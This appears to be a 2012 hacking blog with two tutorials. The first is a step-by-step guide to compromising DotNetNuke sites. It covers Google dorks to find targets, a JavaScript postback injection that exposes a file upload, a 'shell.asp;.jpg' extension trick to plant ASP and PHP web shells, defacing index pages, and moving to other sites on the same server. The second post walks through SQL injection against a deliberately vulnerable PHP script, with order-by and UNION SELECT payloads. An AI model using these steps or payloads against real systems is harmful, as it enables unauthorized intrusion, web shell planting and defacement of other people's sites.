Friday 8 June 2012

[Hot Tutorial!!!]DNN(DotNetNuke) attack+shell uploading[pics/Highly detailed]


Hello everyone!!
I am going to tell you about the DotNetNuke exploit. I know some of you know about it, but it is a very good exploit to hack .NET sites. It is a fucking exploit. You can even hack all sites hosted on the same server. You can upload any file using it.

Is it easy??? Yes. It is easy compared to other hacking attacks such as SQL Injection and Cross-Site Scripting.

What is DNN ?

DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke mainly provides a Content Management System (CMS) for personal websites.

Here is the step by step tutorial.
By default you can upload files with the following extensions:
Code:
*.swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png,
*.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg,
*.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
but the admin may change this list, and then you will get a shell directly.
step 1: use this dork to find a vulnerable site
Code:
inurl:home/tabid/36/language/en-US/Default.aspx
Other dorks you can use:
Code:
inurl:fcklinkgallery.aspx
inurl:/portals/0
[Image: temp1nd.jpg]

step 2: now open any site like
Code:
http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx
replace "home/tabid/36/language/en-US/Default.aspx" with Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
so your URL will become
Code:
http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
then hit enter

and if you are lucky you will get this
[Image: temp2x.jpg]

step 3: Select the 3rd option [file]
[Image: temp3.jpg]

step 4: inject the following JavaScript code in the browser address bar
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
You will get this upload option.
[Image: temp4.jpg]

step 4: Now just upload your file. For example, mine is z.txt. When it is uploaded we can see it in the root dir.
[Image: temp5.jpg]

step 5: Navigate to
Code:
http://www.vulsite.com/portals/0/z.txt
[Image: temp6h.jpg]

You can see our file was successfully uploaded.

Method to upload a shell:

Things you need:
An ASP shell
r57 or C99 Shell or any other shell

step 4: rename your ASP shell to
Code:
yourshell.asp;.jpg
and upload it.

step 5: Navigate to it through
Code:
http://www.vulsite.com/portals/0/yourshell.asp;.jpg
[Image: temp7.jpg]

step 6: Now upload your PHP shell using the upload file option marked in the above image.

step 7: Navigate to it through
Code:
http://www.vulsite.com/portals/0/yourphpshell.php
Voila, you have your shell. Yeye

Deface
step 8: Now replace the original index.html with your own index.html. That's it.

All sites on the server
Well, you can hack all sites hosted on the same server.
[Image: temp8.jpg]
For that, follow the image and click on the item marked there; you will find all sites hosted on the same server. Click on any one site, and now you know what to do.

Sunday 20 May 2012

SQL Injection behind the Scene (SQL injection behind the scenes)

Well, many people are injecting sites with SQL injection, but most of them don't know what is going on behind it. So I have made this small tutorial for them. This is just the basic scene behind MySQL injection.
Let's say the server has an index.html with the following portion:
<html>
<body>
<a href="book.php?id=1">book</a>
</body>
</html>

Let's say the server has another file named book.php that contains the following PHP code.

<?php
// Make a MySQL Connection
$con = mysql_connect("localhost","user","pass");
if (!$con)
  {
  die('Could not connect: ' . mysql_error());
  }
mysql_select_db("my_db", $con);
// The id parameter is taken straight from the URL and concatenated into the
// query with no validation or escaping: this is the injection point.
$id=$_GET['id'];
$result = mysql_query("SELECT id,name,price FROM book WHERE id=$id");
// Fetch the first row as an associative array so $row['name'] works
$row=mysql_fetch_assoc($result);
echo "Name:".$row['name'];
echo "Price:".$row['price'];
?>


The book table looks like this:
[Image: 454545u.jpg]

Now when we click on "book" we get to this link.

Code:
www.site.com/book.php?id=1
and we get the output
Code:
name=sql price=15

So when you inject with '
Code:
www.site.com/book.php?id=1'

the following query will be sent to the server

Code:
SELECT id,name,price FROM book WHERE id=1'
The server interprets the special characters ' , / , \ , * as incorrect syntax, and we get a MySQL error.
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1.

Counting the number of columns:

Code:
www.site.com/book.php?id=1 order by 1--
So the following query will be sent to the server
Code:
SELECT id,name,price FROM book WHERE id=1 order by 1
Meaning: order by the first (id) column

Code:
www.site.com/book.php?id=1 order by 2--
So the following query will be sent to the server
Code:
SELECT id,name,price FROM book WHERE id=1 order by 2
Meaning: order by the second (name) column

Code:
www.site.com/book.php?id=1 order by 3--
So the following query will be sent to the server
Code:
SELECT id,name,price FROM book WHERE id=1 order by 3
Meaning: order by the third (price) column

Code:
www.site.com/book.php?id=1 order by 4--
So the following query will be sent to the server
Code:
SELECT id,name,price FROM book WHERE id=1 order by 4
Meaning: order by the fourth column, which does not exist, so we will get an error

Code:
Unknown column '4' in 'order clause'

Union select part :

Code:
www.site.com/book.php?id=1 UnioN seLect 1,2,3--
The following query will be sent to the server
Code:
SELECT id,name,price FROM book WHERE id=1 UnioN select 1,2,3

-- is used to ignore the rest of the query.

Here the output will be the combination of the first query and the second, injected query. It is necessary to make sure that the first query returns no records, so that we get the output of our injected query. That is easy; we can do it in many ways, like
Code:
www.site.com/book.php?id=null UnioN seLect 1,2,3--

Now the server goes through the book table looking for a row where id is set to null. Since it will not find a row where id is set to null, no records will be returned. The only record that will be returned will be from our injected query.

Tip: All you have to do is specify a value that does not occur in the table.
Code:
www.site.com/book.php?id=xyz UnioN seLect 1,2,3--
www.site.com/book.php?id=-1 UnioN seLect 1,2,3--
www.site.com/book.php?id=1 div 0 UnioN seLect 1,2,3--
Just put something that looks out of the ordinary, as best you can tell by looking at the legitimate values.
When a number is expected, zero and negative numbers often work well. For a text argument, simply use a string such as "NoSuchRecord", "NotInTable", or the ever-popular "sjdhalksjhdlka". Just as long as it won't return records.

We get the numbers 2 and 3 on screen.

Why do we see these numbers on screen?

Basically, 2 and 3 are the values returned in place of the name and price columns.
In the source file there is an echo statement which displays those columns of the returned row, and that is what we see on screen. Look at the PHP source file above and see
Code:
echo "Name:".$row['name'];
echo "Price:".$row['price'];

That's why we get
Code:
Name:2  Price:3

Difference between integer-based and string-based injection:

Let's say the code is:
PHP Code:
$id=$_GET['id']; $result = mysql_query("SELECT id,name,price FROM book WHERE id=$id");

Here id=value,
so whatever we write is accepted directly as id.

Now look at the following code
PHP Code:
$id=$_GET['id']; $result = mysql_query("SELECT id,name,price FROM book WHERE id='$id'");

Here id='value',
so to close the first ' we have to add another ' after the value

Code:
www.site.com/book.php?id=1' order by 1-- -

will become
Code:
SELECT id,name,price FROM book WHERE id='1' order by 1-- -